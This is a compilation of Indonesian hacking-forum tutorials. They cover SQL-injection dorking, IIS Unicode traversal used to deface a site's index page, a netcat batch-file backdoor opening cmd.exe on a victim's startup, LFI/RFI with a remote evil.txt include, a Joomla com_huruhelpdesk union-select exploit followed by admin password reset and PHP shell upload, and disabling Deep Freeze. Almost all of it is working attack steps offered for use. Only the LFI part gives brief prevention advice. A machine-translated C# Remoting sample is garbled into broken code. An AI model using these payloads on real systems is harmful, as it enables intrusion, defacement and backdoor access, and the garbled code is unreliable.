1. Siapkan dulu sql injection scannernya. silahkan menuju ke tekape: http://tool.suramz.com/scanner.php
2. Kemudian masukan dorknya. dork bisa anda dapatkan ditoko2 terdekat seperti ditoko ini: http://suramz.com/suram/dork.txt

3. lalu, pilih salah satu dork yang anda suka. misalnya: inurl:news.php?id=
4. Setelah itu, Masukan dorknya dikotak hitam input! yang ada bacaan = inurl:.php?=id+site:am
5. Terus yang terakhir klik GASAK !!
6. Tunggu beberapa saat..... waiiting is boringting

7. Nah jika anda menemukan site2 yang warnanya ijo yang ada tulisan <-- maho detected (: berarti situs itu vuln dan bisa diinjek kalau anda menemukan kata2 <-- suram mas bro :'( berarti itu tidak bisa 8. Gimana mudah bukan ? semua orang bisa kok melakukannya. cuma karna belom tau aja Terus gimana om abis itu ? hayaaahh, tinggal masukin ke tool havij aja kok repot2 jika memang kamu serius mau belajar sql injection step by step belajar lah manual. tanpa menggunakan tool. karna nanti dengan sendirinya kamu bisa tau fungsi2 penginjectkan sql injection hehehhe
oke sekian dulu tutorial cupu dari saya. jika ada salah2 kata. maklum NEWBIE om
Sumber
Always With US BeaCheater

Langkah Sederhana Buat Deface With CGI Bug

Langkah 1 : Mencari target

Mencari target dapat dilakukan dengan berbagai cara hal ini tergantung kreativitas dan sarana yang dimiliki, dalam hal ini bisa berbentuk script IRC, scanner. Sebagai dasar mengetahui OS yang digunakan server suatu site dapat diketahui dengan mencarinya pada situs http://www.netcraft.com/

Langkah 2 : Unicode

Setelah target didapat maka digunakan Unicode. Unicode itu sendiri penulis juga tidak terlalu mengetahui secara mendetail, tapi pada dasarnya Unicode menggunakan bahasa ASCII. Server yang menggunakan OS NT dengan IIS sendiri mempunyai bug yang bisa ditembus dengan Unicode dalam hal ini bila server itu belum dipatch. Unicode yang berhasil ditemukan untuk memasuki server NT sudah banyak. Dan yang bisa dicoba sebagai berikut:

http://target/_vti_bin/..%c0%af../.....exe?/c+dir+c:\
http://target/scripts/..%c0%af../..%...exe?/c+dir+c:\
http://target/msadc/..%c0%af../..%c0...exe?/c+dir+c:\
http://target/cgi-bin/..%c0%af../..%...exe?/c+dir+c:\
http://target/scripts/..%255c..%255c...exe?/c+dir+c:\
Bila Unicode tersebut berhasil maka akan dapat dilihat tampilan seperti berikut:

Directory of c:\
06/03/01 09:59a (DIR) InetPub
08/08/01 06:14p (DIR) WINNT

Langkah 3 :Mencari halaman depan

Saat membuka situs tersebut pada browser, kita pasti akan melihat tampilan muka dari site tersebut, perlu diperhatikan adalah file tampilan muka tersebut apa? biasanya antara lain: index.htm, index.html, default.htm, default.html. Kemudian dengan mengunakan Unicode tersebut kita mencari file tersebut letaknya dimana, biasanya di C:\inetpub\wwwroot (hal ini belum tentu). untuk mencari file tersebut dapat digunakan perintah:

/c+dir/s+c:\index.htm

Hal ini berarti perintah mencari file index.htm di dalam drive C
Untuk melihat apakah file index.htm tersebut adalah yang digunakan pada halaman depan, dipergunakan perintah :

/c+type+c:\direktory dan nama file, contoh : /c+type+c:\inetpub\wwwroot\index.htm

Setelah anda menemukan file index.htm tersebut, maka sebaiknya anda copy dulu, hal ini agar tindakan Deface kita tidak terlalu merugikan Administrator dari server situs tersebut. Sehingga nantinya Admin tersebut mempunyai backup dari file index.
perintah copy itu sendiri adalah:

/c+copy+c:\

contoh untuk pencopyan adalah:

/c+copy+c:\inetpub\wwwroot\index.htm backupindex.htm

untuk mempermudah pekerjaan dapat dilakukan pencopyan file cmd.exe yg berada di direktory c:/winnt/system32 dengan menggunakan nama anda, seperti :

/c+copy+c:\winnt\system32\cmd.exe+c:\deface.exe

hal ini berarti anda mencopy file cmd.exe ke dir c dgn nama deface.exe, sehingga untuk perintah2 selanjutnya tidak memerlukan /winnt/system32/cmd.exe?/ tapi cukup /deface.exe?/



Langkah 4 : Meng-Copy file index.htm

echo dalam dos berarti anda membuat file maka bila file index.htm yg asli anda echo berarti anda timpa dengan file index anda. Untuk perintahnya adalah:

/deface.exe?/c+echo+"deface+was+here"+>+c:\inetpub\wwwroot\inde x.htm

sehingga tampilan site depan telah terganti dengan tulisan
deface was here
Code:
Catatan:

Hal ini berlaku bila file index.htm tersebut dapat diecho, karena sebagian server membatasi direktory root dengan atribut read only, sehingga perintah echo index.htm akan menghasilkan :
Access Denied
Untuk membuat deface anda menjadi lebih bagus, dapat digunakan bahasa HTML dan ASCII
perintah-perintah lain :

membuat direktory = /c+mkdir+c:\
merubah nama file = /c+ren+c:\file
menghapus file = /c+del+c:\file
menghapus file Read-Only = /c+del+/R+c:\file

Always With US BeaCheater

Hacking a Network Computer

I wrote this because it really worked for me a few times and I hope it does for you too, all you need is very a gullible target.

As we all know, a Trojan is very likely to be picked up by AV, what you need is Netcat, netcat opens a port on a computer for access (If used correctly by a batch file you open a port on a target computer). You will need to write a batch file. The batch file to copy netcat on the remote computer will have to be run from the target computer (The person on the target will have to execute the batch file in some way). Open Notepad and type this in:

code :
@echo off

cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Save the file as a batch file using Notepad.

The next batch file will be used to make sure the port you specified opens up every time windows starts up, you can specify any port you wish. Open Notepad and type:
@echo off

cd\
netcat.exe -L -p 9999 -d -e cmd.exe
Save the file as a batch file using Notepad, this will be the file that is copied into the startup folder in the previous batch file we wrote. You can bind the batch file to another file and share that file, let the target execute that file so that he can copy netcat and the other batch file onto his/hers computer thus opening port 9999, after port 9999 has been opened you can then use telnet and telnet to that port on the target computer to have full access without ever needing any passwords of any sort. After you are in change the Administrator password for if something happens to your files, the command is this:

net user Administrator newpassword

Now from here you can do what you want, e.g try shutting down the target computer by browsing to his system32 folder and then type in:

shutdown -r -t 10 -c "Hello"

the computer will then restart in 10 seconds time. You can even play around more by Installing Cain & Abel on your computer and then installing Abel remotely on his computer (Since you know the Administrator password) Once you have Abel on the target you can start and stop services and do more!

sumber
Always With US BeaCheater

Bagaimana Membuat Server Remote

Contoh ini menunjukkan cara membuat versi Remoting dari server Hello World. Ketika klien memanggil HelloMethod pada kelas HelloServer, obyek server menambahkan string lulus dari klien ke "Hai Ada" dan mengembalikan string yang dihasilkan kembali ke klien. Contoh kode berikut menunjukkan kedua obyek server dan aplikasi server.

using System;
menggunakan System.Runtime.Remoting;
menggunakan System.Runtime.Remoting.Channels;
menggunakan System.Runtime.Remoting.Channels.Tcp;

namespace Microsoft.Samples.Remoting.RemotingSamples {
public class Contoh {
public static int Main (string [] args) {
TcpChannel chan baru = TcpChannel (8085);
ChannelServices.RegisterChannel (chan);
RemotingConfiguration.RegisterWellKnownServiceType (
Type.GetType ("RemotingSamples.HelloServer, objek"),
"SayHello", WellKnownObjectMode.SingleCall);
System.Console.WriteLine ("Tekan untuk keluar ...");
System.Console.ReadLine ();
return 0;
}
}}
C #

using System;
menggunakan System.Runtime.Remoting;
menggunakan System.Runtime.Remoting.Channels;
menggunakan System.Runtime.Remoting.Channels.Tcp;

namespace RemotingSamples {
public class HelloServer: MarshalByRefObject {
publik HelloServer () {
Console.WriteLine ("HelloServer diaktifkan");
}

public String HelloMethod (String nama) {
Console.WriteLine ("Hello.HelloMethod: {0}", nama);
kembali "Hai" nama;
}
}}
C #
The HelloServer kelas berasal dari MarshalByRefObject untuk membuatnya remotable. Ketika server dimulai, Anda harus membuat dan mendaftarkan saluran TCP yang akan mendengarkan klien untuk terhubung pada port 8085. Anda juga perlu mendaftarkan remote object dengan kerangka Remoting dengan menelepon RegisterWellKnownType. Parameter untuk panggilan ini adalah sebagai berikut:

1. Nama perakitan yang berisi objek yang sedang terdaftar. Karena objek terkandung dalam executable, Anda memberikan nama dieksekusi di sini. Baik server dan server.exe akan bekerja sejak aturan normal penempatan perakitan berlaku.

2. Parameter berikutnya adalah jenis nama lengkap dari obyek yang terdaftar, dalam hal ini "RemotingSamples.HelloServer" kasus. Anda perlu menentukan baik nama namespace dan classname di sini. Jika Anda tidak menggunakan namespace, Anda lulus classname tersebut.

3. Kemudian, Anda memberikan nama titik akhir dimana objek akan dipublikasikan. Klien harus mengetahui nama ini dalam rangka untuk menyambung ke objek. Setiap string akan bekerja, untuk contoh ini, gunakan "sayHello". Hal ini juga memungkinkan untuk terhubung ke objek remote menggunakan ASP.NET dan jika ini adalah persyaratan, nama titik akhir harus namespace / class.soap. Untuk contoh ini, titik akhir akan RemotingSamples / HelloServer.soap.

4. Parameter terakhir menentukan modus objek, yang dapat SingleCall atau Singleton. Untuk contoh ini, Anda tentukan SingleCall. Modus objek menentukan masa objek ketika diaktifkan pada server. Dalam kasus obyek SingleCall, contoh baru kelas akan dibuat untuk setiap panggilan yang dibuat dari klien, bahkan jika klien yang sama memanggil metode yang sama lebih dari sekali. Di sisi lain, objek Singleton diciptakan sekali saja dan semua klien berkomunikasi dengan objek yang sama.
Sekarang Anda dapat mengkompilasi contoh ini dan jalankan.

csc / debug / r: System.Runtime.Remoting.dll / r: server.cs Object.dll
C #
Sampel kelas harus dipenuhi sebagai eksekusi dan HelloServer kelas akan menjadi dll terpisah.
Ketika Anda mulai server, objek akan dibuat sebagai bagian dari proses pendaftaran sehingga kerangka kerja dapat mengekstrak metadata yang relevan dari objek. Setelah pendaftaran, objek ini hancur dan kerangka kerja mulai mendengarkan untuk klien dapat terhubung pada saluran terdaftar.C # Halo Contoh ServerLihat Sumber
[Contoh ini dapat ditemukan di M: \ web \ users \ situs \ AspnetQuickStart \ v2.0 \ QuickStart \ HowTo \ Sampel \ Remoting \ Halo \Untuk membangun sampel ini, buka command prompt SDK dan arahkan ke jalan di atas. Membangun sampel dengan menggunakan alat membangun msbuild melewati file solusi sebagai parameter pertama: mySample.sln msbuild. Dieksekusi dikompilasi akan ditemukan di direktori direktori \ bin sub.]
Always With US BeaCheater

Tool Hacking



Berikut Isi Koleksi TOP 10 Vital Hacking Software And Tools
- Cain And Abel ( Sniffer )
- John The Ripper (brootforce)
- NetStumbler (Wifi Breaker)
- Nmap ( Network Scanner)
- putty ( Telnet )
- SuperScan ( Scanner & Pinger )
- Hping ( Pinger )
- Lcp ( BruteForce Password )
- Nikto ( scanner Broken Web Server )
- Kismet (Sniffer Wireless Network 802.11 )

DOWNLOADNYA :

DISINI

sumber
Always With US BeaCheater

Tutor Singkat LFI Dan RFI

LFI (Local File Inclusion) adalah sebuah lubang pada site di mana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah sebuah lubang dimana site mengizinkan attacker meng-include-kan file dari luar server.

Penjelasan
fungsi-fungsi yang dapat menyebabkan LFI/RFI:

Code:
include();
include_once();
require();
require_once();

Dengan syarat pada konfigurasi php di server:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

contoh:
misalkan kita punya file index.php dengan content kodenya seperti ini,


Code:
include "../$_GET[imagefile]";
?>

misal $imagefile=image.php
mungkin di url akan terlihat seperti ini bentuknya

Code:
http://www.[target].com/index.php?imagefile=image.php
maka script ini akan menampilkan halaman image.php.


nah disini attacker akan dapat melakukan LFI karena variable imagefile di include begitu saja tanpa menggunakan filter.
misalnya attacker ingin mengakses file passwd yang ada pada server, maka dia akan mencoba memasukan seperti ini ../../../../../../../../../etc/passwd <<>

nah untuk dapat mengelabui script tersebut kita bisa menggunakan (dengan syarat magic_quotes_gpc = off) jadi dibelakang /etc/passwd kita tambahkan seperti

http://www.[target].com/index.php?imagefile=../../../../../../../../../etc/passwd

lalu untuk apa ? yaitu untuk menghilangkan karakter apapun setelah passwd.
* ini disebut null injection.

Nah kita sudah menemukan bug LFI pada website target, sekarang kita coba cari bug RFI dengan menambahkan link file remote (dari luar website) pada variable imagefile. misalnya:

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan file evil.txt misal berisi "hacked by n4is3n"

jika ternyata di browser menampilkan kalimat tersebut berarti website tersebut vulner terhadap bug RFI juga.


Pencegahan
Nah sekarang saatnya untuk pencegahan kedua bug tersebut, yaitu
1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server website Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
3. pada include mungkin bisa ditambahkan "./"
jadinya seperti ini,

Code:
Code:
include("./"$_GET[imagefile].".php");

maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.

http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.
Always With US BeaCheater

Step By Step Hacking Joomla







Step By Step SQL Injection "joomla"

********************************************************************************​******
* title : exploit joomla : com_huruhelpdesk + reset password + pasang php shell
* author : ho1onk
* site : http://ho1onk.fairtopic.com
********************************************************************************​******

============= PENGANTAR ============
khusus bagi teman2 yang
ga doyan donlod, jaringan lelet/lola
mungkin ini bisa jadi solusi
====================================


==========
[+] step 1
==========

buka google.. ketik keyword
Code:
"inurl:/index.php?option=com_huruhelpdesk\"

tes satu per satu
coba kita ambil yang ini
[+] step 2
==========

pasang exploit..

Code:
/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7+from+jos_users--
tu admin nya... :P
nampak..


==========
[+] step 3
==========

coba kita reset password nya
Code:
/index.php?option=com_user&view=reset
hm.. minta email dia.. masukin aj email admin tadi..
enter..
==========
[+] step 4
==========

minta activation pula
hmm.. gimana ne?
tenang.. kita cari dulu activationnya
Code:
/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email,0x3a,activation),5,6,7+from+jos_u ​sers--


tu kluar activatifasinya
hehehe
:)
lanjut...

copas aja ke yang tadi.. enter.. :)


==========
[+] step 5
==========

copas aja ke yang tadi.. enter.. :)

:P

==========
[+] step 6
==========

wkwkkw
minta pasword baru tu.. kasih aja..
hehhehe
==========
[+] step 7
==========

OK langsung aja masuk ke admin nya..
:)
Code:
http://[site]/[pacth]/administrator
wkekwekwke

==========
[+] step 8
==========

masuk ternyata.. heheh
sabar²..

nah.. di sini ente harus ubah dulu "Global configuration" nya
lalu setelah itu masuk ke "media manager"

==========
[+] step 9
==========

nah.. kita ke gloal configuration terlebih dahulu

ubah media settingnya, tambahin aja php
jangan lupa di save..
:D

==========
[+] step 10
==========

OK
lanjut..
buka media manager..

nah, ini tahap terakhir..
upload lah shell php mu..
kwkekwkekwe :)
seep selesai..

bila tidak ada tulisan berwarna merah berrti berhasil..

shell kita ada di sini

Code:
http://[site]/[pacth]/images/namashell.php
OK sekarang terserah ente.. mau apain tu site..

saran ane.. kalo bisa..
uploada aja lagi shell di directory yang lain..
lalu hapus shell yang di directory images tadi..

sekian aja dulu
selamat mencoba.. :D

Harap Di Gunakan Dengan Bijak,,
Always With US BeaCheater

Disable Deep Freeze tanpa Restart


mank menyebalkan sekali nich si beruang putih di setiap warnet.dia akan mengembalikan semuanya ke settingan awal pertama pas di install si beruang putih,gimna kalo kita hajar yuk.??resiko ditanggung penumpang loh :))
ok langsung az langkah2nya :

. klik command run
2. kemudian ketik di textboxnya msconfig
3. nah pada tab SERVICE buang centang pada service DF5Serv
4. kemudian apply. terus di close. ingat jgn di restart.keluar tanpa restart
5. buka task manager klik tab process,cari FrzState2k dan DF5Serv kemudian kill process.
6. close task manager dan icon kecil deepfreze sebelah kiri pun ilang.

untuk pengaktifannya kembali centang lagi di msconfig bagian service pada service DF5Serv

semoga bermanfaat
Always With US BeaCheater